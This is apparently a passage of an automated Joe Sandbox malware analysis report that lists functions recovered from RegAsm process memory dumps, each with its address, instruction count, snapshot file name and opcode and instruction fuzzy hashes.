                                    • Instruction ID: 4996e9349ebe575aea36975ae69dc4d66d38deb814c26c9b330cd0a6de508054
                                    • Opcode Fuzzy Hash: ec41bc59faa07ec3e3f3117602d57136c3f2f934574c6e204da3ef1356cc4f2e
                                    • Instruction Fuzzy Hash: 08727B74E012288FDB65DF69DD84BDABBB2BF88300F1481E9A44DA7265DB345E81CF41
                                    Function 00F68E97 Relevance: .3, Instructions: 319COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cbda4cf32751a0d158e61f6db36a9ce104dbd84bd2c25cb04ac8999202b9d4e0
                                    • Instruction ID: 133b22c824c50a8d8135d15d3459d1c48d8ade44985753258b36044f3a8b0b1e
                                    • Opcode Fuzzy Hash: cbda4cf32751a0d158e61f6db36a9ce104dbd84bd2c25cb04ac8999202b9d4e0
                                    • Instruction Fuzzy Hash: 57E13174E04358CFDB15DFA4C994B9DBBB2AF89304F1481AAD808AB3A5DB345E85CF50
                                    Function 00F69841 Relevance: .3, Instructions: 273COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fccbc45588024f14fe8858497eac9d619fb39c7d205894eb433385aa11076137
                                    • Instruction ID: e99c72187c674c9ad269dc336cc3dc777d584107e23e455eab046c8be4ddbf17
                                    • Opcode Fuzzy Hash: fccbc45588024f14fe8858497eac9d619fb39c7d205894eb433385aa11076137
                                    • Instruction Fuzzy Hash: AAC1AC74E00218CFDB54DFA5D984B9DBBB6BF88304F2084AAD809AB355DB349E85DF50
                                    Function 00F67E49 Relevance: .3, Instructions: 273COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1ee66ac5a399c22423849c60888618db5d0a5919fe18959939892df09b1f4605
                                    • Instruction ID: acb24493df475526abd6fcbb6cd85dfffa05ba1626901e43532cbef79cc73395
                                    • Opcode Fuzzy Hash: 1ee66ac5a399c22423849c60888618db5d0a5919fe18959939892df09b1f4605
                                    • Instruction Fuzzy Hash: 41D1AE74E00318CFDB54DFA5D954B9DBBB2AF89300F2085AAD809AB355DB345E85DF10
                                    Function 00F693E0 Relevance: .3, Instructions: 272COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 166932619e92e936d49ebece29d67f6657154e73fdc2cd58c512f7b9ce52b94a
                                    • Instruction ID: 92342ae2f5f0abb10ed115ed20b11e386cf9a024b83bd73b093b87d2005e5785
                                    • Opcode Fuzzy Hash: 166932619e92e936d49ebece29d67f6657154e73fdc2cd58c512f7b9ce52b94a
                                    • Instruction Fuzzy Hash: E4D1AC74E00218CFDB54DFA5D984B9DBBB6EF88300F2085AAD809AB355DB349E85CF50
                                    Function 00F69CA1 Relevance: .3, Instructions: 272COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a1acd34ce5f71c0375e58f1ae44542c21e5485b61b1bd7099854f687b008d30
                                    • Instruction ID: 1f7b4d65640004dc58ea342cb0de7796dffb6f0f8c7a47a8664a01f1ceb6861a
                                    • Opcode Fuzzy Hash: 2a1acd34ce5f71c0375e58f1ae44542c21e5485b61b1bd7099854f687b008d30
                                    • Instruction Fuzzy Hash: 72D1AE74E00218CFDB54DFA5D984B9DBBB2BF88300F2085AAD809AB355DB355E85DF50
                                    Function 00F6A100 Relevance: .3, Instructions: 271COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b4a89657dc223d69f52912af80fb961ae6c35e719ff56370b855c2481efcb671
                                    • Instruction ID: 298306723e4a82f43b872810bbfbd72dfc2a3cfc419b46ea890b8d13f301a116
                                    • Opcode Fuzzy Hash: b4a89657dc223d69f52912af80fb961ae6c35e719ff56370b855c2481efcb671
                                    • Instruction Fuzzy Hash: F4D1CF74E00218CFDB54DFA5D984B9DBBB2BF88300F2081A9D809AB365DB359E85CF50
                                    Function 06162450 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cff6d6b7b9ab56fc8b9d95471fddbc8d339f2fa95041ca164cf2de466d068e30
                                    • Instruction ID: c303218c4d57c25268479204e25bfcb3d7bf53b35028aac1f04b02d88df0b01f
                                    • Opcode Fuzzy Hash: cff6d6b7b9ab56fc8b9d95471fddbc8d339f2fa95041ca164cf2de466d068e30
                                    • Instruction Fuzzy Hash: 7AC1C174E01218CFDB54DFA5C994BADBBB2BF89300F1080A9D819AB365DB359E85CF50
                                    Function 06160498 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b2dac0a16bba2f8c98a388c14f2ea807b6dc84843052cbccedc9a7f8df9ee2f9
                                    • Instruction ID: 3567a48c5a9ae81e93eb9dcff742361a40763be78064afb48dad9b61847b142b
                                    • Opcode Fuzzy Hash: b2dac0a16bba2f8c98a388c14f2ea807b6dc84843052cbccedc9a7f8df9ee2f9
                                    • Instruction Fuzzy Hash: B1C1C174E00218CFDB54DFA5C984BADBBB2BF89300F1080A9D809AB365DB359E85CF50
                                    Function 06160040 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 00057fd562bf482f266211de60e72c506d3e7c0079bb074f740eba43c58aa228
                                    • Instruction ID: 44b4d52df9aedcddcfb6cb2b367a015df99adeb2130460512b7c1501cd378b0c
                                    • Opcode Fuzzy Hash: 00057fd562bf482f266211de60e72c506d3e7c0079bb074f740eba43c58aa228
                                    • Instruction Fuzzy Hash: 13C1C274E00218CFDB54DFA5D984B9DBBB2BF89304F2080A9D819AB365DB359E85CF50
                                    Function 06162D00 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5671e1a70e4df60b207609aaf6931cf12103b78ff05f7fd517b0633c77854ce4
                                    • Instruction ID: 841937875a768fd77ca9e37a97eb2ac2a8b156f994e2bb89e323944cea16a8f5
                                    • Opcode Fuzzy Hash: 5671e1a70e4df60b207609aaf6931cf12103b78ff05f7fd517b0633c77854ce4
                                    • Instruction Fuzzy Hash: E5C1C274E00218CFDB54DFA5C984BADBBB2BF89300F1085A9D819AB365DB359E85CF50
                                    Function 061628A8 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e6040a45adb638b1fa41ad489227a291260f9730328f9fc1fe5dcb6d0b277789
                                    • Instruction ID: 99fd93057ea2a084b362494c4be5ba8db3b7b3cada5568ed49c3f83df26a9710
                                    • Opcode Fuzzy Hash: e6040a45adb638b1fa41ad489227a291260f9730328f9fc1fe5dcb6d0b277789
                                    • Instruction Fuzzy Hash: 5EC1C074E00218CFDB54DFA5C984BADBBB2BF89300F1085A9D819AB365DB359E85CF50
                                    Function 061608F0 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bc83642c88fec3ab20a6c2f63ebfb58a0a39bafb627924c53e9105c7b3c6ca4a
                                    • Instruction ID: 42596905d04761c7faa8779f3c2dc6318c68f0f0e125cd4542936a45f495a0b1
                                    • Opcode Fuzzy Hash: bc83642c88fec3ab20a6c2f63ebfb58a0a39bafb627924c53e9105c7b3c6ca4a
                                    • Instruction Fuzzy Hash: B2C1C174E00218CFDB54DFA5C984B9DBBB2BF89304F2081A9D819AB355DB359E85CF50
                                    Function 06161748 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0eb88875a37f207057291836d586b5f5398f388896a8a8da28a6092cdb76ae3c
                                    • Instruction ID: a1699776e8806c42fc73915059697c0ab35c7667810f81ca8e2a9e8e7d013edc
                                    • Opcode Fuzzy Hash: 0eb88875a37f207057291836d586b5f5398f388896a8a8da28a6092cdb76ae3c
                                    • Instruction Fuzzy Hash: 2AC1D274E01218CFDB54DFA9C984BADBBB2BF89300F1084A9D808AB365DB355E85CF50
                                    Function 061635B0 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a246f432e758f0f8d59a6ce70cba27d7ba6583a33c387ee1fe95458dedc60cce
                                    • Instruction ID: f03e7b4c031868e372fc297b0dec83cd3faecd3bccf34e017857ae10ee450976
                                    • Opcode Fuzzy Hash: a246f432e758f0f8d59a6ce70cba27d7ba6583a33c387ee1fe95458dedc60cce
                                    • Instruction Fuzzy Hash: F9C1C174E00218CFDB54DFA5C984BADBBB2BF89304F1081A9D819AB365DB359E85CF50
                                    Function 06163158 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 827baf9c2d4d437feca31abb1c20852d66927e2ffc102f7b115709fd5d26432c
                                    • Instruction ID: 33b8e070e3dbac0c8efabf45401596407fc40be9f9604dd75591e48e0ddc32c0
                                    • Opcode Fuzzy Hash: 827baf9c2d4d437feca31abb1c20852d66927e2ffc102f7b115709fd5d26432c
                                    • Instruction Fuzzy Hash: 12C1C174E00218CFDB54DFA5C984BADBBB2BF89300F1085A9D819AB365DB359E85CF50
                                    Function 06161FF8 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e7bdd064812b78704849df3a4de5e5b92561a2f937b79ef18b99f477f78c393a
                                    • Instruction ID: dbc587ccacd286f6b75a8659a750842cd3209fb9894532f0df53ef5de83578b7
                                    • Opcode Fuzzy Hash: e7bdd064812b78704849df3a4de5e5b92561a2f937b79ef18b99f477f78c393a
                                    • Instruction Fuzzy Hash: DDC1C274E00218CFDB54DFA5C984BADBBB2BF89300F1080A9D809AB365DB355E85CF50
                                    Function 06161BA0 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 64aed12c807fbeb16fa72692a469873055cd8e9c127ad4a4e82cac6cad74f69d
                                    • Instruction ID: 58ef25f3e661c49217a912aa1f2a924fbf4d08db4b54471fccd3210973f24b19
                                    • Opcode Fuzzy Hash: 64aed12c807fbeb16fa72692a469873055cd8e9c127ad4a4e82cac6cad74f69d
                                    • Instruction Fuzzy Hash: 40C1C274E01218CFDB54DFA9C984BADBBB2BF89300F1084A9D809AB355DB359E85CF50
                                    Function 06146A38 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4d1c0739cf139ba4d6956c434d18790e586819f32f1829df478da600283e72d1
                                    • Instruction ID: 6d040e531593c5606a1fb058975afd86012f8be8d7b27e09e2049a6c13d87d7b
                                    • Opcode Fuzzy Hash: 4d1c0739cf139ba4d6956c434d18790e586819f32f1829df478da600283e72d1
                                    • Instruction Fuzzy Hash: 29C1C174E00218CFDB54EFA5C984B9DBBB2BF89304F1084A9D809AB355DB359E85CF50
                                    Function 06145028 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 50064029e332c517a0e2cdb326d81d4c208eeae174951f68373e618a20451e49
                                    • Instruction ID: 367f298232b808695feaef79ce4253281a1deeed9f0fa60d47d28b3f89d1d372
                                    • Opcode Fuzzy Hash: 50064029e332c517a0e2cdb326d81d4c208eeae174951f68373e618a20451e49
                                    • Instruction Fuzzy Hash: 60C1D274E00218CFDB54EFA5C984BADBBB2BF89304F1084A9D819AB355DB359E85CF50
                                    Function 0614F028 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 88d94e0ae511f0ff52ef06e1973d0c00f650d58f094699e2be7f20e88202c0c7
                                    • Instruction ID: a82b7b9405d87a748a1fc273eb02f01a23faeba404e066882300f8e427e9b2a4
                                    • Opcode Fuzzy Hash: 88d94e0ae511f0ff52ef06e1973d0c00f650d58f094699e2be7f20e88202c0c7
                                    • Instruction Fuzzy Hash: 72C1D374E00218CFDB54EFA5D984BADBBB2BF89300F1080A9D819AB355DB359E85CF50
                                    Function 0614E850 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9f85e265d264f14b4970aefe3c85801028edded65423acee2f51ca2da1b65a9f
                                    • Instruction ID: 0487eda69a1e9b8e6655e9602f8003f3d77a03c3be6cf5b5af88f55aea04f5c4
                                    • Opcode Fuzzy Hash: 9f85e265d264f14b4970aefe3c85801028edded65423acee2f51ca2da1b65a9f
                                    • Instruction Fuzzy Hash: 2DC1D374E00218CFDB54EFA5C984B9DBBB2BF89304F1084A9D819AB365DB359E85CF50
                                    Function 06148448 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48c4fb153439ba0802584c047bb5720a829ce666cf390c90f08ca8c3e2a74dd1
                                    • Instruction ID: 496028fafc37de00e571ff2c77c75fdee93447b0dd0c28976f303a21beec7e04
                                    • Opcode Fuzzy Hash: 48c4fb153439ba0802584c047bb5720a829ce666cf390c90f08ca8c3e2a74dd1
                                    • Instruction Fuzzy Hash: 46C1D274E00218CFDB54EFA5D984B9DBBB2BF89304F1084A9D809AB365DB359E85CF50
                                    Function 06143A70 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a93f5dccaa3234d03fbe9402d7b7fb51233a93df1a1b5a8c141e3e6eb5bf7369
                                    • Instruction ID: b7f0a60309336ca93834f83917f07c032c5a9019736f75ba56f40c384e06c456
                                    • Opcode Fuzzy Hash: a93f5dccaa3234d03fbe9402d7b7fb51233a93df1a1b5a8c141e3e6eb5bf7369
                                    • Instruction Fuzzy Hash: 4DC1C274E00218CFDB54EFA5D984B9DBBB2BF89300F1084A9D819AB365DB359E85CF50
                                    Function 06146E90 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 473fe2802ba8db1e5c8de6407e42765bef2d571760ddf7a732a1d0a4236319b4
                                    • Instruction ID: ec8bc98db48fdc899eb2965657ef537eeeb0557395b719714f94703aa6625fb2
                                    • Opcode Fuzzy Hash: 473fe2802ba8db1e5c8de6407e42765bef2d571760ddf7a732a1d0a4236319b4
                                    • Instruction Fuzzy Hash: BBC1D274E00218CFDB54EFA5C994BADBBB2BF89300F1084A9D808AB355DB359E85CF50
                                    Function 06145480 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2ce73ce43dc5e4930e062177fedd06dd45357b9e4d144076e67ac63153bb04c0
                                    • Instruction ID: ffa8f5c31645dee3378144d63242002cbba567c119d9e748ddbe13fb22589f40
                                    • Opcode Fuzzy Hash: 2ce73ce43dc5e4930e062177fedd06dd45357b9e4d144076e67ac63153bb04c0
                                    • Instruction Fuzzy Hash: ADC1C374E00218CFDB54EFA5D944B9DBBB2BF89300F1084A9D809AB355DB359E85CF50
                                    Function 0614F480 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d5c7456bfaf54fff7e51b345fcb9035bccc5e36113c9949a53dd1e1144ff85ca
                                    • Instruction ID: 81b5e80d46c34271719501b454e17d906c187e84565e4eb96b3bacbaa38b418a
                                    • Opcode Fuzzy Hash: d5c7456bfaf54fff7e51b345fcb9035bccc5e36113c9949a53dd1e1144ff85ca
                                    • Instruction Fuzzy Hash: 98C1C274E00218CFDB54EFA5D984B9DBBB2BF89300F1080A9D819AB365DB359E85CF50
                                    Function 061488A0 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8de8a712170233a90a3823353d11bdf370d21fa54e5c677f0c1b61f05ae677aa
                                    • Instruction ID: ac516125e0264d3b0e8cdcb568eace71d0b9306f41ddd97e74b3a21e970be1f5
                                    • Opcode Fuzzy Hash: 8de8a712170233a90a3823353d11bdf370d21fa54e5c677f0c1b61f05ae677aa
                                    • Instruction Fuzzy Hash: ECC1C374E01218CFDB54EFA5C944B9DBBB2BF89300F1081A9D819AB355DB359E85CF50
                                    Function 061458D8 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3811a280be31ee9ab4dc3fda8303afb1b93a83fad90f2add3c19861e7e44d9c0
                                    • Instruction ID: 7d4c7bfc050e9538c776f82350cc1d20bbfb2af02bf6ebc883420a265a0b7538
                                    • Opcode Fuzzy Hash: 3811a280be31ee9ab4dc3fda8303afb1b93a83fad90f2add3c19861e7e44d9c0
                                    • Instruction Fuzzy Hash: B9C1C274E00218CFDB54EFA5D984B9DBBB2BF89300F1084A9D809AB355DB359E85CF50
                                    Function 0614F8D8 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8967cdb42db9bc5f274c6a0a2dfc864340b5186f11c43cd063570c8f5a3eef52
                                    • Instruction ID: 19d14c55026f7e4dcd1464d895aceb1f35faa5ff5caa60f76e419346b0c8a8d6
                                    • Opcode Fuzzy Hash: 8967cdb42db9bc5f274c6a0a2dfc864340b5186f11c43cd063570c8f5a3eef52
                                    • Instruction Fuzzy Hash: A9C1D374E00218CFDB54EFA5C994B9DBBB2BF89300F1081A9D819AB355DB359E85CF50
                                    Function 06143EC8 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3d22891a354ad1c6d5255e549e0d78c0f24c3a272f5ca81cc6224d33847c7c64
                                    • Instruction ID: 07c1316227c8e710cb2d90eb63e1e19c60b652a32e046afbca3d12abf01af178
                                    • Opcode Fuzzy Hash: 3d22891a354ad1c6d5255e549e0d78c0f24c3a272f5ca81cc6224d33847c7c64
                                    • Instruction Fuzzy Hash: 68C1C074E00218CFDB54EFA5D984BADBBB2BF89300F1084A9D819AB355DB359E85CF50
                                    Function 06148CF8 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0e3c9d9c3e3238000ac5c7ad2870d127f6ee53af7db61a90bc7b6d5a7a5b48ee
                                    • Instruction ID: 78fb9690bd85a222ec7469cab0982f5af150a12539bba1f05dbbf7de10c1f4c3
                                    • Opcode Fuzzy Hash: 0e3c9d9c3e3238000ac5c7ad2870d127f6ee53af7db61a90bc7b6d5a7a5b48ee
                                    • Instruction Fuzzy Hash: 41C1D374E01218CFDB54EFA5C984BADBBB2BF89300F1085A9D809AB355DB359E85CF50
                                    Function 061472E8 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4c3edd697c7e7e98f6ff263a59531d49a12f4c4148f7de3108285b0046a9f9a
                                    • Instruction ID: d49d4fbbf703abc3d1960d16899469bdbbcadd66074634ab4f3154d8dc993408
                                    • Opcode Fuzzy Hash: a4c3edd697c7e7e98f6ff263a59531d49a12f4c4148f7de3108285b0046a9f9a
                                    • Instruction Fuzzy Hash: B7C1C274E00218CFDB54EFA5D954B9DBBB2BF89300F1084A9D809AB355DB355E85CF50
                                    Function 06145D30 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5143fa8e45d6ab7d67a4c28e0361e73b8dfba5a7424eb786dc46c6513ebcf378
                                    • Instruction ID: 2ff4171f27ae3f5928e85ff250983c433139dfb56254af3eac02f568156d3a0e
                                    • Opcode Fuzzy Hash: 5143fa8e45d6ab7d67a4c28e0361e73b8dfba5a7424eb786dc46c6513ebcf378
